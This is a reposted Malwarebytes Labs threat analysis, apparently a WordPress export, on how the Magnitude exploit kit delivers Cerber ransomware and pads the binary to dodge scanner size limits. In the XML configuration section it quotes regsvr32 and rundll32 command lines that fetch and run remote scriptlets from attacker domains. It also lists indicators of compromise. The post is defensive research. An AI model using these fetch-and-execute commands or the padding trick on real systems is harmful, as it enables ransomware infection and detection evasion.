{"id":8656,"date":"2017-08-09T09:10:10","date_gmt":"2017-08-09T17:10:10","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2429\/"},"modified":"2017-08-09T09:10:10","modified_gmt":"2017-08-09T17:10:10","slug":"news-2429","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/09\/news-2429\/","title":{"rendered":"Cerber ransomware delivered in format of a different order of Magnitude"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 09 Aug 2017 15:54:54 +0000<\/strong><\/p>\n<p>As a follow up to our study into the Magnitude exploit kit and its gate (which we profiled in a <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">previous blog post<\/a>), we take a look at an interesting technique used to distribute the Cerber ransomware.<\/p>\n<p>Exploit kits are a very effective means of serving malicious payloads and an important aspect is the delivery mechanism in itself. The typical scenario is for the exploit code to download a payload to disk and then run it. But there are exceptions which we have witnessed in the past:<\/p>\n<ul>\n<li>a single encrypted payload is downloaded and then split into two different binaries on disk (ref:\u00a0<a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2013\/04\/redkit-exploit-kit-does-the-splits\/\" target=\"_blank\" rel=\"noopener\">Redkit exploit kit does the splits<\/a>)<\/li>\n<li>payload is downloaded straight into memory, without touching the disk AKA fileless (ref:\u00a0<a href=\"http:\/\/malware.dontneedcoffee.com\/2014\/08\/angler-ek-now-capable-of-fileless.html\" target=\"_blank\" rel=\"noopener\">Angler EK : now capable of &#8220;fileless&#8221; infection<\/a>)<\/li>\n<\/ul>\n<p>There may be different motivations behind such deviations from the standard drive-by download methodology, but typically the goal is to evade antivirus scanners\/signatures by adopting a less common behaviour.<\/p>\n<p>Today, we take a look at yet another technique which has been used by Magnitude EK where the payload is largely inflated before it is run.<\/p>\n<h2>Overview<\/h2>\n<p>The Magnitude exploit kit has been using an XML configuration file critical to retrieving the malware payload (Cerber) for several months already, and some researchers have run into it before [1] [2] [3].<\/p>\n<p>Around the end of July &#8211; according to our captures &#8211; we spotted a new\u00a0<em>for loop<\/em>\u00a0which assigns a variable that is being concatenated. This piece of code adds &#8216;junk&#8217; to the existing Cerber binary on-the-fly, to grow its initial size from say, 245 KB*, to anywhere between 70 to 100 MB*.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19194 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png\" alt=\"\" width=\"640\" height=\"382\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber.png 640w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber-300x179.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Magnitude_to_Cerber-600x358.png 600w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 1: Workflow from Magnitude EK to Cerber infection via larger malicious binary<\/em><\/p>\n<p><em>* these numbers are from a specific capture and will vary based on changes made to Magnitude EK<\/em><\/p>\n<p>This is not a bug, but rather, as they say, &#8220;a feature&#8221; which allows to bypass security products that have a hard limit on file sizes they can scan. In the rest of this post, we will describe how this process known as binary padding is implemented in Magnitude EK.<\/p>\n<h2>Delivery chain<\/h2>\n<p>Magnitude EK is notorious for distributing the Cerber ransomware specifically to certain geolocations, and in particular South Korea, via its own gate, called <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">Magnigate<\/a>. For a while, we have noticed that Magnitude EK has been using Internet Explorer vulnerabilities without necessarily resorting to Flash exploits.\u00a0Another interesting artifact part of the EK flow is the use of an XML configuration file which contains JScript code.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19195 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png\" alt=\"\" width=\"821\" height=\"917\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow.png 821w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow-269x300.png 269w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/flow-537x600.png 537w\" sizes=\"auto, (max-width: 821px) 100vw, 821px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 2: Network traffic view showing the EK&#8217;s main artifacts<\/em><\/p>\n<h2>XML Configuration<\/h2>\n<p>In prior instances of Magnitude EK, <em>regsvr32.exe<\/em> was used to retrieve and execute the binary payload (without any size modification) using the scriptlet passed as a URL parameter. Originally, we saw the payload being launched from the %temp% folder but sometime in mid-July it also ran from the Desktop (perhaps a transition?):<\/p>\n<p><em>&#8220;C:WindowsSystem32regsvr32.exe&#8221; scrobj.dll \/s \/u \/n \/i:http:\/\/e6cgbdc11cx350s4.lessnot.men\/f62241e72664fd04fed6f79656757d9d.sct<\/em><\/p>\n<p>On July 31st, we noticed <em>rundll32.exe<\/em>\u00a0with a different looking command still parsing the remote scriptlet:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19220 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32.png\" alt=\"\" width=\"591\" height=\"171\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32.png 591w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/rundll32-300x87.png 300w\" sizes=\"auto, (max-width: 591px) 100vw, 591px\" \/><\/p>\n<p style=\"text-align: center\"><em>Figure 3: From browser exploit to malicious JScript via rundll32<\/em><\/p>\n<p><em>&#8220;C:WindowsSystem32rundll32.exe&#8221; <strong>javascript<\/strong>:&#8221;..mshtml,<span style=\"color: #ff0000\">RunHTMLApplication<\/span> &#8220;;document.write();GetObject(&#8216;script:<span style=\"color: #0000ff\">http:\/\/7fm0cd7d16w37.noneno.space\/4a44e2019f2e77c83f55c5c223bf10a0<\/span>&#8216;);<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19221 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png\" alt=\"\" width=\"686\" height=\"687\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML.png 686w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-150x150.png 150w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-300x300.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/XML-600x600.png 600w\" sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 4: The XML config, showing the embedded JScript<\/em><\/p>\n<h2>Binary padding<\/h2>\n<p>The purpose of this script is to retrieve the original Cerber payload (245 KB) and add data (95 MB) to it via a technique known as <a href=\"https:\/\/attack.mitre.org\/wiki\/Technique\/T1009\" target=\"_blank\" rel=\"noopener\">binary padding<\/a>. The Shell aplication uses ADODB.Stream to save &#8220;text&#8221; data (<em>N4mQj8624F9Npw10s61F<\/em>) with a particular charset (<em>iso-8859-1<\/em>) used for text to binary data conversion.<\/p>\n<p>The reason this data amounts to 95 MB is because it concatenates that string via a loop 14 times, which is the equivalent of writing &#8220;<em>N4mQj8624F9Npw10s61F<\/em>&#8221; 4,782,969 million times (3^14) and saving it to a file.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png\" data-rel=\"lightbox-3\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19222 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png\" alt=\"\" width=\"907\" height=\"312\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat.png 907w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat-300x103.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/concat-600x206.png 600w\" sizes=\"auto, (max-width: 907px) 100vw, 907px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 5: Crafting the inflated binary by appending a text string millions of times<\/em><\/p>\n<p><em>rundll32.exe<\/em> downloads the original Cerber and adds the junk data on the fly:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png\" data-rel=\"lightbox-4\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19227 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png\" alt=\"\" width=\"769\" height=\"447\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize.png 769w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize-300x174.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/filesize-600x349.png 600w\" sizes=\"auto, (max-width: 769px) 100vw, 769px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 6: Process view showing data being written to the new, inflated Cerber binary<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png\" data-rel=\"lightbox-5\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19228 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png\" alt=\"\" width=\"676\" height=\"1001\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber.png 676w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber-203x300.png 203w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflate_Cerber-405x600.png 405w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 7: Hexadecimal view of the final binary, showing the added &#8216;junk&#8217; data<\/em><\/p>\n<p>Finally, it runs it:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png\" data-rel=\"lightbox-6\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19229 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png\" alt=\"\" width=\"703\" height=\"88\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run.png 703w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run-300x38.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/run-600x75.png 600w\" sizes=\"auto, (max-width: 703px) 100vw, 703px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 8: The new Cerber binary is invoked via rundll32<\/em><\/p>\n<p>A few seconds later, Cerber has encrypted files and displays the ransom note:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png\" data-rel=\"lightbox-7\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19234 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png\" alt=\"\" width=\"812\" height=\"547\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption.png 812w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption-300x202.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/encryption-600x404.png 600w\" sizes=\"auto, (max-width: 812px) 100vw, 812px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 9: Wallpaper hijack shows the ransom note<\/em><\/p>\n<h2>Tricks of the trade<\/h2>\n<p>While Magnitude EK has a very narrow distribution channel, it remains an interesting exploit kit because not only does it have its own <a href=\"https:\/\/blog.malwarebytes.com\/cybercrime\/2017\/08\/enemy-at-the-gates-reviewing-the-magnitude-exploit-kit-redirection-chain\/\" target=\"_blank\" rel=\"noopener\">gate<\/a>, but it also continues to evolve with various tricks. The binary padding technique shows an effort to bypass certain security scanners that will ignore files above a certain size. However, this does not prevent the malicious binary (no matter how big) to run its course and fully infect a machine.<\/p>\n<h2>Protection<\/h2>\n<p>The key to protecting against these kinds of attacks is to block threats regardless of the shape they come as and thwart them as early as possible in the delivery chain. Malwarebytes stops Magnitude EK proactively using its anti-exploit module <em>before<\/em> the malicious payload is even downloaded. As an added protection layer, our anti-ransomware component also stops this &#8216;larger than usual&#8217; Cerber.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png\" data-rel=\"lightbox-8\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19235 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png\" alt=\"\" width=\"799\" height=\"337\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block.png 799w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block-300x127.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/anti-exploit_block-600x253.png 600w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 10: Malwarebytes blocking the Magnitude exploit kit in its drive-by download attempt<\/em><\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png\" data-rel=\"lightbox-9\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-19236 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png\" alt=\"\" width=\"799\" height=\"338\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block.png 799w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block-300x127.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/ransom_block-600x254.png 600w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 11: Malwarebytes (other protection modules disabled for testing) stopping the ransomware infection<\/em><\/p>\n<h2>References<\/h2>\n<p>[1]\u00a0<a href=\"https:\/\/pcsxcetrasupport3.wordpress.com\/2017\/04\/24\/a-look-at-the-magnitude-exploit-kit-encoding\/\" target=\"_blank\" rel=\"noopener\">https:\/\/pcsxcetrasupport3.wordpress.com\/2017\/04\/24\/a-look-at-the-magnitude-exploit-kit-encoding\/<\/a><\/p>\n<p>[2]\u00a0<a href=\"https:\/\/www.zscaler.com\/blogs\/research\/wonder-woman-piracy-and-cerber-ransomware\" target=\"_blank\" rel=\"noopener\">https:\/\/www.zscaler.com\/blogs\/research\/wonder-woman-piracy-and-cerber-ransomware<\/a><\/p>\n<p>[3]\u00a0<a href=\"https:\/\/zerophagemalware.com\/2017\/08\/01\/magnitude-ek-xml-package-and-changes\/\" target=\"_blank\" rel=\"noopener\">https:\/\/zerophagemalware.com\/2017\/08\/01\/magnitude-ek-xml-package-and-changes\/<\/a><\/p>\n<h2>Indicators of compromise<\/h2>\n<p><strong>Magnitude EK<\/strong><\/p>\n<pre>217.182.227.103,spinner-art.org,Magnigate (step 1)  151.80.246.147,511bcl9645285d2w.himlead.com,Magnigate (step 2)  51.254.229.220,7fm0cd7d16w37.noneno.space,Magnitude EK Landing  51.254.229.220,7fm0cd7d16w37.noneno.space,Magnitude XML\/JScript  51.254.229.220,7fm0cd7d16w37.noneno.space,Cerber (original)<\/pre>\n<p><strong>Cerber (original)<\/strong><\/p>\n<pre>4bdd366d8ee35503cf062ae22abe5a4a2d8d8907  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png\" data-rel=\"lightbox-10\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19237\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png\" alt=\"\" width=\"784\" height=\"444\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original.png 784w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original-300x170.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/original-600x340.png 600w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/a><\/pre>\n<p><strong>Cerber (inflated)<\/strong><\/p>\n<pre>3da8e94c6d1efe2a039f49a1e748df5eef01af5a  <a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png\" data-rel=\"lightbox-11\" title=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-19238\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png\" alt=\"\" width=\"785\" height=\"441\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated.png 785w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-300x169.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-600x337.png 600w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/inflated-400x225.png 400w\" sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/a><\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\">Cerber ransomware delivered in format of a different order of Magnitude<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Wed, 09 Aug 2017 15:54:54 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/' title='Cerber ransomware delivered in format of a different order of Magnitude'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2017\/08\/Untitled-design-1.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>We review a trick that the Magnitude exploit kit uses to bypass security scanners.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/exploits-threat-analysis\/\" rel=\"category tag\">Exploits<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/binary-padding\/\" rel=\"tag\">binary padding<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/cerber\/\" rel=\"tag\">cerber<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit-kit\/\" rel=\"tag\">exploit kit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/gate\/\" rel=\"tag\">gate<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/magnigate\/\" rel=\"tag\">Magnigate<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/magnitude-ek\/\" rel=\"tag\">magnitude EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ransomware\/\" rel=\"tag\">ransomware<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/xml\/\" rel=\"tag\">XML<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/' title='Cerber ransomware delivered in format of a different order of Magnitude'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\">Cerber ransomware delivered in format of a different order of Magnitude<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[13487,10905,10534,10987,13488,13278,13489,3765,10494,13072],"class_list":["post-8656","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-binary-padding","tag-cerber","tag-exploit-kit","tag-exploits","tag-gate","tag-magnigate","tag-magnitude-ek","tag-ransomware","tag-threat-analysis","tag-xml"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8656"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8656\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8656"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}